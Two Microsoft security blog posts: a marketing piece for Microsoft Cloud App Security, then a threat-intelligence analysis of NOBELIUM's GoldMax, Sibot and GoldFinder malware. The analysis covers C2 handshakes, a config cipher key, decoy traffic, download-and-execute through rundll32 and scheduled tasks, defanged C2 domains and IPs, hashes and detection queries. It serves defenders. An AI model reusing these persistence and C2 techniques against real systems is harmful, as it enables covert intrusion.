A better cloud access security broker: Securing your SaaS cloud apps and services with Microsoft Cloud App Security

Microsoft Malware Protection Center - Thu, 03/04/2021 - 12:00pm

Today’s business uses an average of 1,180 cloud apps¹, with many of those organizations securing their apps through cloud access security brokers (CASB). The organizational need for a CASB has grown alongside the use of cloud apps to enable remote work and greater user productivity. When security responsibilities for cloud apps are shared between you and the cloud application or cloud provider, there’s a chance that some key security practices may be overlooked.

Beyond the areas where your IT team or the platform provider are responsible for security, some SaaS apps and services may fall into an unprotected gray zone. According to the shared responsibility model, IT teams are responsible for securing their organizations’ identity and access management (IAM), network resources, endpoints, devices, passwords, and more. But there’s currently not much clear guidance around SaaS Security Posture Management (SSPM). That’s where the right CASB can make the difference.

How the right CASB can help

A CASB is designed to analyze session traffic to and from the cloud, as well as highlight risks and block inappropriate access. With so many people now working remotely on personal devices, a CASB helps ensure that users accessing your cloud apps (having been properly authenticated by your identity provider) have the rights and permissions to use the selected app—provided it’s from an allowed device, and the session adheres to any other policy conditions defined by your organization.

To accomplish all this, a CASB usually provides three primary services—app discovery and management, secure access to all your apps, data protection, and threat protection. App discovery tells you which cloud apps the employees in your organization are accessing and helps you decide how to manage those apps. Data protection ensures that your people aren’t accessing, using, and sharing sensitive data, and threat protection helps defend against inappropriate use of applications through malware, ransomware, or other threats.

For a large healthcare organization such as St. Luke’s, adopting Microsoft Cloud App Security enabled them to allow or block apps based on compliance with the Health Insurance Portability and Accountability Act (HIPAA) and reduce the possibility of leaked patient data.

“One of our challenges prior to deploying Cloud App Security was detecting shadow IT,” said Erin Boris, Information Security Strategic Specialist at SLUHN. “Gaining that visibility through Cloud App Security helps us with software inventory, app rationalization, and most importantly, data loss prevention.”  

Bridging the gap

SaaS Security Posture Management is a solution category that is part of the broader security posture management umbrella of features, specifically protecting SaaS products such as Office 365, Google Workspace, or Salesforce.

Gartner included SaaS Security Posture Management in the 2020 Gartner Hype Cycle for Cloud Security, defining SaaS Security Posture Management as “tools that continuously assess the security risk and manage the security posture of SaaS applications—offering suggestions for improved configuration to reduce risk.”

A CASB should help your team discover all SaaS apps within its purview, then determine which are shadow IT (a potential attack surface and a vector for malware). SaaS Security Posture Management takes it one step further to identify the abuse of these apps, identify misconfigurations, track configuration changes, and deploy automatic remediation to prevent data leakage and damage. SaaS Security Posture Management also covers SaaS storage, file sharing, and collaboration apps, which can be sources of data leakage.

The Microsoft Cloud App Security difference

Microsoft Cloud App Security helps secure all your cloud apps using sophisticated analytics to combat cyber threats across both cloud-native and on-premises apps and services, Microsoft and non-Microsoft alike. Recognized as a Leader in Gartner Magic Quadrant for Cloud Access Security Brokers2, Cloud App Security addressed key features this way:

  • Shadow IT discovery: Discover and manage unauthorized access that can put your security at risk via integration with Microsoft Defender for Endpoint, or also leverage your firewall and secure web gateway, and then choose to sanction or unsanction apps.
  • Information protection: Gain the power to enforce complex information and data loss prevention (DLP) policies across third-party apps through deep integration with Microsoft Information Protection, combined with the reverse proxy capabilities of Microsoft Cloud App Security.
  • Threat protection: Leverage the protection of the independent threat protection capabilities in MCAS, including our own UEBA capabilities as well as the native integration with Microsoft Defender suite, which includes Microsoft Defender for Endpoint, Microsoft Defender for Office, and Microsoft Defender for Identity to provide a unified view into devices, Office apps, and identities across on-premises and cloud resources. Monitor behaviors and blocking nefarious content.
  • Secure access: Connect with Azure Active Directory (Azure AD) to enforce and monitor access and session policies (such as leveraging conditional access from Azure Active Directory) across all managed cloud resources.
  • Security Posture Management: the recommendations and security practices that ensure each organization has intentionally set aside a standard of practices and then receives and implements the practices that help them achieve their goals.
    • CSPM: Cloud Security Posture Management provides multi-cloud security recommendations for the various workloads across IaaS such as AWS, GCP, and Azure.
    • SSPM: SaaS Security Posture Management helps secure multi-app environments and provide discovery for your SaaS apps, helping you identify misconfigurations, as well as track user activity and configuration changes—all to protect your data and to keep you compliant.

According to Forrester’s recent Total Economic Impact (TEI) study, Cloud App Security also helps customers save time and resources—delivering 151% ROI over three years and less than 3-month payback. Other key findings include: 

  • 80 percent reduction in time to monitor, assess, and govern cloud application portfolio risks.
  • 75 percent elimination of threats automatically due to increased visibility and automated threat protection.
  • 40 percent reduction in the likelihood of a data breach, with potential savings of more than $1.6 million over three years.
  • 90 percent reduction in hours required to audit cloud apps.

In all of your efforts to protect your cloud apps, Microsoft Cloud App Security delivers an easy and flexible solution with a basic investment of 15 hours to deploy. You’ll benefit from recommendations for your cloud security posture (based on Center for Internet Security standards), as well as suggestions on risk scoring for apps, connected information protection, labeling and encryption, and granular session controls from start to finish of every session. And Cloud App Security can grow incrementally, enabling the perfect balance between security for your organization and productivity for your users.

Learn more

For further information on how your organization can benefit from Microsoft Cloud App Security, connect with us at the links below:

Follow the Microsoft Cloud App Security Ninja blog and learn about Ninja Training.

Go deeper with these interactive guides:

To experience the benefits of full-featured CASB, sign up for a free trial—Microsoft Cloud App Security.

Follow us on LinkedIn at #CloudAppSecurity. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity on Twitter, and Microsoft Security on LinkedIn for the latest news and updates on cybersecurity.

¹Netskope report, 2018

2Gartner Magic Quadrant for Cloud Access Security Brokers, Craig Lawson, Steve Riley, October 28, 2020.

The Gartner document is available upon request from Microsoft.

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post A better cloud access security broker: Securing your SaaS cloud apps and services with Microsoft Cloud App Security appeared first on Microsoft Security.

GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence

Microsoft Malware Protection Center - Thu, 03/04/2021 - 12:00pm

Microsoft continues to work with partners and customers to expand our knowledge of the threat actor behind the nation-state cyberattacks that compromised the supply chain of SolarWinds and impacted multiple other organizations. As we have shared previously, we have observed the threat actor using both backdoor and other malware implants to establish sustained access to affected networks. As part of our commitment to transparency and intelligence-sharing in the defender community, we continue to update analysis and investigative resources as we discover new tactics and techniques used by the threat actor.

Introducing NOBELIUM

Microsoft Threat Intelligence Center (MSTIC) is naming the actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, and related components as NOBELIUM.

Recent investigations have identified three new pieces of malware being used in late-stage activity by NOBELIUM. This blog provides detailed analysis of these malware strains to help defenders detect, protect, and respond to this threat. We continue to partner with FireEye to understand these threats and protect our mutual customers. FireEye’s analysis of the malware used by NOBELIUM is here.

Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020. These tools are new pieces of malware that are unique to this actor. They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with TEARDROP and other hands-on-keyboard actions.

These capabilities differ from previously known NOBELIUM tools and attack patterns, and reiterate the actor’s sophistication. In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams. This knowledge is reflected in the actor’s operational decisions, from the choice of command-and-control (C2) infrastructure to the naming of scheduled tasks used to maintain persistence.

With this actor’s established pattern of using unique infrastructure and tooling for each target, and the operational value of maintaining their persistence on compromised networks, it is likely that additional components will be discovered as our investigation into the actions of this threat actor continues.

New NOBELIUM malware

Maintaining persistence is critical for any threat actor after gaining access to a network. In addition to the backdoor in the SolarWinds software, NOBELIUM has been observed using stolen credentials to access cloud services like email and storage, as well as compromised identities to gain and maintain access to networks via virtual private networks (VPNs) and remote access tools. Microsoft assesses that the newly surfaced pieces of malware were used by the actor to maintain persistence and perform actions on very specific and targeted networks post-compromise, even evading initial detection during incident response.


The GoldMax malware was discovered persisting on networks as a scheduled task impersonating systems management software. In the instances it was encountered, the scheduled task was named after software that existed in the environment, and pointed to a subfolder in ProgramData named after that software, with a similar executable name. The executable, however, was the GoldMax implant.

Written in Go, GoldMax acts as command-and-control backdoor for the actor. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running.

GoldMax establishes a secure session key with its C2 and uses that key to securely communicate with the C2, preventing non-GoldMax-initiated connections from receiving and identifying malicious traffic. The C2 can send commands to be launched for various operations, including native OS commands, via psuedo-randomly generated cookies. The hardcoded cookies are unique to each implant, appearing to be random strings but mapping to victims and operations on the actor side.

Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM’s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised – and Microsoft has provided that indicator context where it is available to us.

Upon execution, GoldMax retrieves a list of the system’s network interfaces; the malware terminates if it is unable to do so or no network interface is configured. It then attempts to determine if any of the network interfaces has the following hardcoded MAC address: c8:27:cc:c2:37:5a. If so, it terminates.

Figure 1. HardwareAddr.String() call, hardcoded MAC address, and os.Exit() call

Configuration file

GoldMax is designed to store its configuration data in an encrypted file named features.dat.tmp. The file name varies in different versions of GoldMax, but in all observed variants, the configuration file carries a .tmp file extension and is located in the same directory as GoldMax. The first time GoldMax is run, it uses a set of embedded default values to create and populate its configuration file on disk. The next time GoldMax  runs, instead of using its embedded configuration data, it loads the configuration data from its configuration file stored on the file system.

The data from the configuration file typically matches the default configuration data embedded in GoldMax, since the embedded data was initially used to create the configuration file. However, GoldMax comes with a command-and-control feature that allows its operators to dynamically update its configuration data on the fly. When this happens, GoldMax overwrites the existing data in its configuration file with the new configuration data received from its operators, so the next time GoldMax is run, it uses the most up-to-date version of its configuration data to initialize its runtime settings.

The configuration data is encrypted using the AES-256 encryption algorithm, CFB encryption mode, and the following cipher key: 4naehrkz5alao2jd035zjh3j1v1dvyyc (key varies in different versions of GoldMax). The AES encrypted configuration data is then Base64-encoded using the custom Base64 alphabet “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_” before it is stored in the configuration file on the file system. When run, GoldMax decodes (Base64) and decrypts (AES-256) the configuration data to reveal a custom data structure comprised of the following dynamically generated and hardcoded values (delimited by ‘|’):

Figure 2. Data structure of the GoldMax configuration data

GoldMax proceeds to parse the data structure depicted above and uses the values within to initialize its runtime settings and variables used by its different components.

If the configuration file is not present on the system, (i.e., the first time it runs), GoldMax uses dynamically generated and embedded values to create and populate the data structure depicted above. It then uses the same AES encryption methodology to encrypt the data structure. After encrypting the data structure, GoldMax proceeds to Base64 encode the encrypted data structure and removes all instances of ‘=’ from the Base64 encoded string. It then creates a configuration file on the file system (e.g., features.dat.tmp) and stores the Base64 encoded data in the configuration file.

Activation date

GoldMax’s configuration data contains an execution activation/trigger date, stored as an ASCII Unix/Epoch time value as shown in the configuration data section above, that is essentially meant to function as an “activate after x date/time” feature. After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data.

Figure 3. Inline Unix() function and EPOCH comparison of the current and activation date/time

If an activation date-time value is specified in the configuration data (i.e., not set to ‘0’) and the activation date-time occurs on or before the current date-time of the compromised system, GoldMax commences its malicious activities. Otherwise, GoldMax terminates and continues to do so until the activation date is reached. If no activation date is specified in the configuration data (i.e., field set to ‘0’), the malware commences its malicious activities straightaway.

In all versions of GoldMax analyzed during our investigation, the activation date is initially set to ‘0’. However, through its command-and-control feature, the operators can dynamically update the activation date using a specific C2 command, in which case the new activation date is stored in the configuration file and is checked each time GoldMax runs.

Decoy network traffic

GoldMax is equipped with a decoy network traffic generation feature that allows it to surround its malicious network traffic with seemingly benign traffic. This feature is meant to make distinguishing between malicious and benign traffic more challenging. If the decoy network traffic feature is enabled (set to ‘1’ in the configuration data), GoldMax issues a pseudo-random number of decoy HTTP GET requests (up to four) for URLs pointing to a mixture of legitimate and C2 domain names and/or IP addresses. The exact URL for each request is pseudo-randomly selected from a list of 14 hardcoded URLs. An example URL list comprised of 14 legitimate and C2 URLs is shown below:

Figure 4. Hardcoded URLs from which GoldMax selects up to four to issue HTTP requests for

As shown above, some of the decoy URLs point to the domain name of the actual C2 (e.g., onetechcompany[.]com). However, the particular HTTP resources referenced in the URLs above (e.g., style.css, script.js, icon.ico, etc.) are known to the C2 as being decoy resources that serve no role in the regular C2 communication between GoldMax and its C2.

The Referer value for each decoy HTTP request is also pseudo-randomly selected from a list of four legitimate domain names. For example, we have seen the following in various combinations to make up lists of four domains: www[.]mail[.]com, www[.]bing[.]com, www[.]facebook[.]com, www[.]google[.]com, www[.]twitter[.]com, www[.]yahoo[.]com, etc. For demonstration purposes, an example decoy HTTP GET request is included below (the Connection and User-Agent HTTP headers and their values are manually added to each request by GoldMax and remain the same across all decoy HTTP requests, regardless of the destination URL):

Figure 5. Sample decoy HTTP GET request

RSA session key

The next step in the execution cycle involves establishing a secure session key between GoldMax and its C2 server. GoldMax first requests a session key from its C2 server by sending an HTTP GET request that contains a custom HTTP Cookie value that is unique to each implant. The Cookie value is comprised of the following dynamically generated and hardcoded values:

Figure 6. HTTP Cookie value in HTTP GET request

An example request containing the custom Cookie value is shown below:

Figure 7. Sample HTTP GET request with the custom Cookie value

The User-Agent and Connection values above are hardcoded in the HTTP request. The Referer value is pseudo-randomly selected from a list of four legitimate domain names using various combinations of the following: www[.]mail[.]com, www[.]bing[.]com, www[.]facebook[.]com, www[.]google[.]com, www[.]twitter[.]com, www[.]yahoo[.]com, etc.

In response to the request above, GoldMax expects to receive an HTTP 200 response containing a very specific and hardcoded ASCII string (e.g., “uFLa12nFmKkjrmjj”). The seemingly random-looking string is typically 10-16 bytes long (after all leading and trailing white space has been removed). It can best be described as a “shared secret” between the C2 and each individual implant (the string varies in different versions of GoldMax). It serves as an acknowledgement that the C2 server has received GoldMax’s request for a new a session key. If GoldMax does not receive the expected string, it sleeps for a random amount of time and repeats (indefinitely) the process described above to obtain the expected string from its C2 server, or until the GoldMax process is terminated.

After receiving the expected string, GoldMax sleeps for up to 14 seconds before proceeding. If the decoy traffic option is enabled in the configuration data, GoldMax issues a pseudo-random number of HTTP GET requests (as described under the decoy network traffic section above). GoldMax then issues a new HTTP GET request to its C2 server containing a new set of hardcoded Cookie values.

Figure 8. Sample HTTP GET request showing hardcoded Cookie values

The only observed difference between the first and second HTTP GET requests is the value of the second Cookie highlighted above (example values: iC0Pf2a48 from the first request vs. J4yeUYKyeuNa2 from the second request above). In response to the request, GoldMax receives an encrypted RSA session key (Base64-encoded). Each version of GoldMax contains an RSA private key which GoldMax proceeds to decode (using pem.Decode()) and parse (using x509.ParsePKCS1PrivateKey()). GoldMax uses rsa.DecryptOAEP() with the parsed private key to decrypt (using RSA-OAEP) the RSA-encrypted session key received from its C2 server. From this point on, the session key is used to encrypt data sent between GoldMax and its C2 server.

C2 commands

After establishing a session key, GoldMax reaches out to its C2 server to receive, decrypt (AES-256), parse, and execute commands. To retrieve an encrypted C2 command from its C2 server, GoldMax sends an HTTP GET request. This HTTP GET request only contains a single Cookie value, which matches the Cookie value used during the session key establishment process (the User-Agent and Connection headers and values are hardcoded, as before):

Figure 9. Sample HTTP GET request containing a single Cookie value

In response to the request above, GoldMax receives an encrypted (AES-256) and encoded (Base64 using custom Base64 alphabet) C2 command. The command is encrypted using the session key established between GoldMax and its C2 server. After decoding and decrypting the C2 command, GoldMax proceeds to parse the C2 command.

C2 commands are represented as seemingly random alphanumerical ASCII strings (e.g., “KbwUQrcooAntqNMddu4XRj”) that are unique to each implant but known to the C2 server. The C2 commands allow the operator to download and execute files on the compromised system, upload files from the compromised system to the C2 server, execute OS commands on the compromised system, spawn a command shell, and dynamically update GoldMax’s configuration data. These dynamic updates to Goldmax configuration data enable ability to set a new activation date, replace the existing C2 URL and User-Agent values, enable/disable decoy network traffic feature, and update the number range used by its PRNG.

It is worth noting that all observed versions of GoldMax were compiled with the Go compiler version 1.14.2 (released in April 2020). In all observed versions, the main Go source code file for GoldMax was located under the following directory: /var/www/html/builds/. The Go packages and libraries used during the compilation process of GoldMax were mostly located under the /var/www/html/go/src/ directory (e.g., /var/www/html/go/src/net/http/http.go).


Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server.  The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk. The VBScript is then run via a scheduled task.

Sibot reaches out to a legitimate but compromised website to download a DLL to a folder under System32. In observed instances the DLL is downloaded to C:\windows\system32\drivers\, renamed with a .sys extension, and then executed by rundll32. The scheduled task calls an MSHTA application to run Sibot via the obfuscated script. This simplistic implementation allows for a low footprint for the actor, as they can download and run new code without changes to the compromised endpoint by just updating the hosted DLL. The compromised website used to host the DLL is different for every compromised network and includes websites of medical device manufacturers and IT service providers.

We have observed three variants of this malware, all of which are obfuscated:

  • Variant A is the simplest of the three. It only installs the second-stage script in the default registry value under the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot.
  •  Variant B registers a scheduled task named Sibot and programmed to run daily. This task, which is saved by Windows in the file C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\sibot, runs the following command-line daily:

The registry key referenced in this command-line contains the second-stage script.

  • Variant C is a standalone version of the second-stage script. However, while the second-stage script from Variant A is designed to be executed from the registry, this variant is designed to run from a file.

Figure 10. Sibot variants

The second-stage script

The purpose of the second-stage script is to download and run a payload from a remote server. The script can be customized with the following parameters:

  • Command-line with which to run the payload
  • Directory where the payload is installed
  • URL of the C2 server containing the payload to download
  • HTTP request to use for the download (e.g., GET)

When run, the first thing the script does is to retrieve a GUID associated to a LAN connection present on the machine by leveraging the interface offered by the WMI Class Root\Microsoft\Homenet\HNet_Connection. If a LAN connection is not available, the script defaults to a hardcoded GUID. This GUID is later communicated to the C2. It’s possible that the threat actor used this GUID to verify that the threat is running in a desirable environment, i.e., a real machine with LAN connections available. The next step of the second-stage script is to check if the machine is configured to use proxies, and if so, to get the address of a proxy. The script uses the StdRegProv WMI class to read the configuration data from the registry key  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer and extract a valid proxy server.

At this point, the script establishes an HTTP connection to the C2 server. It sets the user-agent and the connection GUID as HTTP header variables, then sends the HTTP request. In both versions of the script, the request is GET. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file. In both variants of the second-stage script, the payload is a DLL with a .SYS extension and saved in the %windir%\system32\drivers folder. Finally, the script uses the Win32_Process WMI class to execute the payload DLL via the rundll32.exe utility.

While the script is running in the context of a script host process (e.g. wscript.exe), the actions carried out through the WMI interface originates from the WMI host process (WmiPrvSe.exe). This effectively breaks the process chain between the action’s origin (the script host) and its execution (the WMI host), making it more difficult to trace back events to their true origin. Forensic analysis is also hindered by the lack of correlation between the execution of the second-stage script and the events it carries out via WMI.


Another tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g., hxxps://185[.]225[.]69[.]69/) and logs the HTTP response to a plaintext log file (e.g., loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file:

  • Target: The C2 URL
  • StatusCode: HTTP response/status code
  • Headers: HTTP response headers and their values
  • Data: Data from the HTTP response received from the C2

An example log entry using a sample date is shown below:

Figure 11. Sample log entry

If the response is not an HTTP 200 (OK) response and contains an HTTP Location field (indicating a redirect), GoldFinder recursively follows and logs the redirects until it receives an HTTP 200 response, at which point it terminates. If a Location header is present in the response and the Location value starts with the string “http”, GoldFinder extracts the Location URL (i.e., redirect URL) and issues a new HTTP GET request for the redirect URL. It again logs the request and its response in the plaintext log file:

Figure 12. Sample log file

If GoldFinder receives an HTTP 200 status code in response to the request above, indicating no more redirects, it terminates. Otherwise, it recursively follows the redirect up to 99 times or until it receives an HTTP 200 response, whichever occurs first.

When launched, GoldFinder can identify all HTTP proxy servers and other redirectors such as network security devices that an HTTP request travels through inside and outside the network to reach the intended C2 server. When used on a compromised device, GoldFinder can be used to inform the actor of potential points of discovery or logging of their other actions, such as C2 communication with GoldMax.

GoldFinder was compiled using Go 1.14.2, released in April 2020, from a Go file named finder.go with the following path: /tmp/finder.go. The Go packages and libraries used during the compilation process of GoldFinder were mostly located under the /var/www/html/go/src/ directory (e.g., /var/www/html/go/src/net/http/http.go).

Comprehensive protections for persistent techniques

The sophisticated NOBELIUM attack requires a comprehensive incident response to identify, investigate, and respond. Get the latest information and guidance from Microsoft at

Microsoft Defender Antivirus detects the new NOBELIUM components discussed in this blog as the following malware:

  • Trojan:Win64/GoldMax.A!dha
  • TrojanDownloader:VBS/Sibot.A!dha
  • Trojan:VBS/Sibot.B!dha
  • Trojan:Win64/GoldFinder.A!dha
  • Behavior:Win32/Sibot.C

Turning on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus ensures that artificial intelligence and machine learning can quickly identify and stop new and unknown threats. Tamper protection features prevent attackers from stopping security services. Attack surface reduction rules, specifically the rule Block executable files from running unless they meet a prevalence, age, or trusted list criterion, can help block new malware and attacker tools introduced by threat actors.


Figure 13. Security recommendations in threat and vulnerability management

Detections of new malware by Microsoft Defender Antivirus are reported as alerts in Microsoft Defender Security Center. Additionally, endpoint detection and response capabilities in Microsoft Defender for Endpoint detect malicious behavior related to these NOBELIUM components, which are surfaced as alerts with the following titles:

  • GoldMax malware
  • Sibot malware
  • GoldFinder Malware

The following alerts, which indicate detection of behavior associated with a wide range of attacks, are also raised for these NOBELIUM components:

  • Suspicious connection to remote service
  • Suspicious Rundll32 Process Execution
  • Suspicious PowerShell command line
  • Suspicious file or script accessed a malicious registry key

Intelligence about these newly surfaced components accrue to the information about NOBELIUM that Microsoft 365 Defender consolidates. Rich investigation tools in Microsoft 365 Defender allow security operations teams to comprehensively respond to this attack. Get comprehensive guidance for using Microsoft 365 Defender to identify, investigate, and respond to the NOBELIUM attack.




Indicators of compromise (IOCs)

Due to the nature of this attack, most samples are unique to each network they were discovered in, however Microsoft has confirmed that these samples available in public repositories are associated with this threat.

Type Threat name Indicator SHA-256 GoldMax 70d93035b0693b0e4ef65eb7f8529e6385d698759cc5b8666a394b2136cc06eb SHA-256 GoldMax 0e1f9d4d0884c68ec25dec355140ea1bab434f5ea0f86f2aade34178ff3a7d91 SHA-256 GoldMax 247a733048b6d5361162957f53910ad6653cdef128eb5c87c46f14e7e3e46983 SHA-256 GoldMax f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c SHA-256 GoldMax 611458206837560511cb007ab5eeb57047025c2edc0643184561a6bf451e8c2c SHA-256 GoldMax b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8 SHA-256 GoldMax bbd16685917b9b35c7480d5711193c1cd0e4e7ccb0f2bf1fd584c0aebca5ae4c SHA-256 GoldFinder 0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9 SHA-256 Sibot 7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb SHA-256 Sibot acc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66 IP address GoldMax and GoldFinder 185[.]225[.]69[.]69/ Domain GoldMax and GoldFInder srfnetwork[.]org Domain GoldMax reyweb[.]com Domain GoldMax onetechcompany [.]com GoldMax C2 decoy traffic

As detailed above, GoldMax employs decoy traffic to blend in with normal network traffic. Below are several examples demonstrating the patterns GoldMax uses to mix legitimate traffic with C2 queries:

185[.]225[.]69[.]69 C2 decoys “onetechcompany” C2 decoys “reyweb” C2 decoys hxxps[:]//cdn[.]mxpnl[.]com/ hxxps[:]//code[.]jquery[.]com/ hxxps[:]//code[.]jquery[.]com/ hxxps[:]//code[.]jquery[.]com/ hxxps[:]//play[.]google[.]com/log?” hxxps[:]//cdn[.]cloudflare[.]com/ hxxps[:]//cdn[.]google[.]com/ hxxps[:]//fonts[.]gstatic[.]com/s/font.woff2″ hxxps[:]//cdn[.]google[.]com/ hxxps[:]//fonts[.]gstatic[.]com/s/font.woff2 hxxps[:]//cdn[.]google[.]com/ hxxps[:]//cdn[.]jquery[.]com/ hxxps[:]//ssl[.]gstatic[.]com/ui/v3/icons hxxps[:]//www.gstatic[.]com/images/? hxxps[:]//cdn[.]mxpnl[.]com/ hxxps[:]//www.gstatic[.]com/images/? hxxps[:]//onetechcompany [.]com/style.css hxxps[:]//ssl[.]gstatic[.]com/ui/v3/icons hxxps[:]//185[.]225[.]69[.]69/style.css hxxps[:]//onetechcompany [.]com/script.js hxxps[:]//reyweb[.]com/style.css hxxps[:]//185[.]225[.]69[.]69/script.js hxxps[:]//onetechcompany [.]com/icon.ico hxxps[:]//reyweb[.]com/script.js hxxps[:]//185[.]225[.]69[.]69/icon.ico hxxps[:]//onetechcompany [.]com/icon.png hxxps[:]//reyweb[.]com/icon.ico hxxps[:]//185[.]225[.]69[.]69/icon.png hxxps[:]//onetechcompany [.]com/scripts/jquery.js hxxps[:]//reyweb[.]com/icon.png hxxps[:]//185[.]225[.]69[.]69/scripts/jquery.js hxxps[:]//onetechcompany [.]com/scripts/bootstrap.js hxxps[:]//reyweb[.]com/scripts/jquery.js hxxps[:]//185[.]225[.]69[.]69/scripts/bootstrap.js hxxps[:]//onetechcompany [.]com/css/style.css hxxps[:]//reyweb[.]com/scripts/bootstrap.js hxxps[:]//185[.]225[.]69[.]69/css/style.css hxxps[:]//onetechcompany [.]com/css/bootstrap.css hxxps[:]//reyweb[.]com/css/style.css hxxps[:]//185[.]225[.]69[.]69/css/bootstrap.css hxxps[:]//reyweb[.]com/css/bootstrap.css Advanced hunting queries Rundll32.exe .sys image loads by reference

Looks for rundll32.exe loading .sys file explicitly by name.

Run query in Microsoft 365 security center:

| where InitiatingProcessFileName =~ 'rundll32.exe'
| where InitiatingProcessCommandLine has_any('.sys,','.sys ')
| where FileName endswith '.sys'
| project Timestamp, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, FolderPath, FileName

Rundll32.exe executing inline VBScript

Looks for rundll32.exe executing specific inline VBScript commands.

Run query in Microsoft 365 security center:

| where FileName =~ 'rundll32.exe'
| where ProcessCommandLine has 'Execute'
and ProcessCommandLine has 'RegRead'
and ProcessCommandLine has 'window.close'
| project Timestamp, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine

Run query in Azure Sentinel (Github link):

| where EventID == 4688
| where Process =~ 'rundll32.exe'
| where CommandLine has_all ('Execute','RegRead','window.close')
| project TimeGenerated, Computer, Account, Process, NewProcessName, CommandLine, ParentProcessName, _ResourceId

VBScript payload stored in registry

Looks for VBScript payload stored in registry, specifically stored within a sub-key of CurrentVersion registry path and excluding common AutoRun persistence locations like Run and RunOnce registry keys.

Run query in Microsoft 365 security center

| where RegistryKey endswith @'\Microsoft\Windows\CurrentVersion'
| where RegistryValueType == 'String'
| where strlen(RegistryValueData) >= 200
| where RegistryValueData has_any('vbscript','jscript','mshtml,','mshtml ','RunHTMLApplication','Execute(','CreateObject','RegRead','window.close')
| where RegistryKey !endswith @'\Software\Microsoft\Windows\CurrentVersion\Run'
and RegistryKey !endswith @'\Software\Microsoft\Windows\CurrentVersion\RunOnce'
| project Timestamp, DeviceId, InitiatingProcessFileName, InitiatingProcessCommandLine, RegistryKey, RegistryValueName, RegistryValueData

Run query in Azure Sentinel (Github link):

let cmdTokens0 = dynamic(['vbscript','jscript']);
let cmdTokens1 = dynamic(['mshtml','RunHTMLApplication']);
let cmdTokens2 = dynamic(['Execute','CreateObject','RegRead','window.close']);
| where TimeGenerated >= ago(14d)
| where EventID == 4688
| where CommandLine has @'\Microsoft\Windows\CurrentVersion'
| where not(CommandLine has_any (@'\Software\Microsoft\Windows\CurrentVersion\Run', @'\Software\Microsoft\Windows\CurrentVersion\RunOnce'))
// If you are receiving false positives, then it may help to make the query more strict by uncommenting the lines below to refine the matches
//| where CommandLine has_any (cmdTokens0)
//| where CommandLine has_all (cmdTokens1)
| where CommandLine has_all (cmdTokens2)
| project TimeGenerated, Computer, Account, Process, NewProcessName, CommandLine, ParentProcessName, _ResourceId

Domain IOC lookup

Looks for identified C2 domains.

Run query in Azure Sentinel (GitHub link)

let DomainNames = dynamic(['', '', '']);
let IPList = dynamic(['']);
let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}';
(union isfuzzy=true
| where SourceIP in (IPList) or DestinationIP in (IPList) or DestinationHostName in~ (DomainNames) or RequestURL has_any (DomainNames) or Message has_any (IPList)
| parse Message with * '(' DNSName ')' *
| extend MessageIP = extract(IPRegex, 0, Message)
| extend IPMatch = case(SourceIP in (IPList), "SourceIP", DestinationIP in (IPList), "DestinationIP", MessageIP in (IPList), "Message", RequestURL in (DomainNames), "RequestUrl", "NoMatch")
| extend timestamp = TimeGenerated, IPCustomEntity = case(IPMatch == "SourceIP", SourceIP, IPMatch == "DestinationIP", DestinationIP, IPMatch == "Message", MessageIP, "NoMatch"), AccountCustomEntity = SourceUserID
| where IPAddresses in (IPList) or Name in~ (DomainNames)
| extend DestinationIPAddress = IPAddresses, DNSName = Name, Host = Computer
| extend timestamp = TimeGenerated, IPCustomEntity = DestinationIPAddress, HostCustomEntity = Host
